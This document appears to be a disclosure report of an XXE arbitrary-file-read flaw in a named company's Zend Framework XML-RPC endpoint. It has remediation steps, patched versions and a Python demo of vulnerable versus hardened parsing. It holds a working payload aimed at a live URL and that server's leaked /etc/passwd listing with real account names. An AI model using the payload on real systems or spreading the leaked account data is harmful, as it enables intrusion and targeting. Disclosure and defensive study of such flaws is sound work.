Arbitrary File Read (XXE) Vulnerability in Etam's Zend Framework XML-RPC Endpoint

Source: Internet
Author: User
Tags: gopher

URL: http://www.etam.com.cn/api/xmlrpc
POST data (an XML external entity pointing at a local file, referenced from inside methodName so that the server's XML-RPC parser expands the file contents into the element):
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
Proof of vulnerability: the server echoed the contents of /etc/passwd in its response. Besides the system accounts it lists a number of interactive accounts (/bin/bash), including ETapp001 with primary group 0:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
memcached:x:497:496:Memcached daemon:/var/run/memcached:/sbin/nologin
nginx:x:496:495:Nginx web server:/var/lib/nginx:/sbin/nologin
ETapp001:x:500:0::/home/ETapp001:/bin/bash
itochu:x:501:501::/var/www/etam/etam.com.cn/itochu:/sbin/nologin
torry:x:502:502::/home/torry:/sbin/nologin
etamftp:x:503:503::/var/www/etam/etam.com.cn/newsletter:/sbin/nologin
etamftp1:x:504:503::/var/www/etam/etam.com.cn/var:/sbin/nologin
dailycheck:x:505:505::/home/dailycheck:/bin/bash
tom01:x:506:506::/home/tom01:/bin/bash
wangliang01:x:507:507::/home/wangliang01:/bin/bash
hanson01:x:508:508::/home/hanson01:/bin/bash
johny01:x:509:509::/home/johny01:/bin/bash
lilei01:x:510:510::/home/lilei01:/bin/bash
william01:x:511:511::/home/william01:/bin/bash
ellie01:x:512:512::/home/ellie01:/bin/bash
sam01:x:513:513::/home/sam01:/bin/bash
jack01:x:514:514::/home/jack01:/bin/bash
eric01:x:515:515::/home/eric01:/bin/bash
torry01:x:516:516::/home/torry01:/bin/bash
nagios:x:517:517::/home/nagios:/bin/bash

Solution:

1. Check which XML parsing library sits underneath the XML-RPC server and make sure it does not resolve external entities: disable external entity loading before any request body is parsed, and reject request bodies that carry a DOCTYPE, since a legitimate XML-RPC call never needs one.
2. Apply the vendor patch.
   Vulnerable versions: 1.11.11, 1.12.0 RC1, 2.0.0 beta4, and earlier
   Fixed versions: 1.11.12, 1.12.0 RC2, 2.0.0 beta5

Upgrade to the fixed release that matches the branch in use.

Upgrade links:
http://framework.zend.com/
http://framework.zend.com/download/latest
http://packages.zendframework.com/
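To make the request above and the fix in step 1 concrete, here is an added example (not code from the original report, and not Zend Framework's own code): a minimal XML-RPC methodName extractor written on top of Python's expat bindings, in two configurations. The "vulnerable" one installs an external entity handler that reads whatever file:// URL the DTD names and feeds it to a child parser, which reproduces what the affected Zend_XmlRpc versions let libxml do; the "hardened" one installs no such handler and refuses any request that declares a DOCTYPE, the shape of the fix. The target file and its single passwd-style line are constructed in a temporary directory so the demo runs offline; the real report read /etc/passwd.

```python
# Added example, not code from the original report or from Zend Framework.
# Two expat-based parsers for the XML-RPC request body from the report: one that
# resolves external entities (vulnerable) and one that refuses DOCTYPEs (hardened).
import os
import tempfile
import xml.parsers.expat
from urllib.parse import unquote, urlparse


def build_xxe_request(path):
    """The request body from the report, parameterised on the target file path."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        "<!ELEMENT methodName ANY>\n"
        f'<!ENTITY xxe SYSTEM "file://{path}">]>\n'
        "<methodCall>\n"
        "<methodName>&xxe;</methodName>\n"
        "</methodCall>\n"
    )


class DoctypeRejected(Exception):
    """Raised by the hardened parser when a request carries a DOCTYPE."""


def _method_name_parser(state):
    """Expat parser that collects the character data inside <methodName>."""
    parser = xml.parsers.expat.ParserCreate()

    def start(name, attrs):
        if name == "methodName":
            state["in_name"] = True

    def end(name):
        if name == "methodName":
            state["in_name"] = False

    def chars(data):
        if state["in_name"]:
            state["text"].append(data)

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    return parser


def extract_method_name_vulnerable(body):
    """Resolve external entities: the file named in the DTD lands in methodName."""
    state = {"in_name": False, "text": []}
    parser = _method_name_parser(state)

    def load_external(context, base, system_id, public_id):
        # The dangerous part: open the attacker-chosen file:// URL and parse it
        # with a child parser, which inherits our handlers, so the file's text
        # is delivered as character data of the element being parsed.
        child = parser.ExternalEntityParserCreate(context)
        with open(unquote(urlparse(system_id).path), "rb") as fh:
            child.Parse(fh.read(), True)
        return 1

    parser.ExternalEntityRefHandler = load_external
    parser.Parse(body, True)
    return "".join(state["text"])


def extract_method_name_hardened(body):
    """No external entity handler is installed, and any DOCTYPE is rejected."""
    state = {"in_name": False, "text": []}
    parser = _method_name_parser(state)

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise DoctypeRejected("XML-RPC requests must not contain a DOCTYPE")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(body, True)
    return "".join(state["text"])


# Constructed sample content standing in for /etc/passwd.
SAMPLE_PASSWD_LINE = "root:x:0:0:root:/root:/bin/bash\n"


def demo():
    """Write the constructed file, send the payload to both parsers, report results."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "passwd")
        with open(target, "w") as fh:
            fh.write(SAMPLE_PASSWD_LINE)
        body = build_xxe_request(target)
        leaked = extract_method_name_vulnerable(body)
        try:
            extract_method_name_hardened(body)
            blocked = False
        except DoctypeRejected:
            blocked = True
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser rejected the request:", blocked)
```

The hardened variant does two independent things on purpose: leaving ExternalEntityRefHandler unset means expat never fetches a SYSTEM entity even if a DOCTYPE slips through, and rejecting the DOCTYPE up front also shuts down internal-entity tricks such as entity expansion bombs that need no file access at all. A plain request with no DTD still parses normally.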
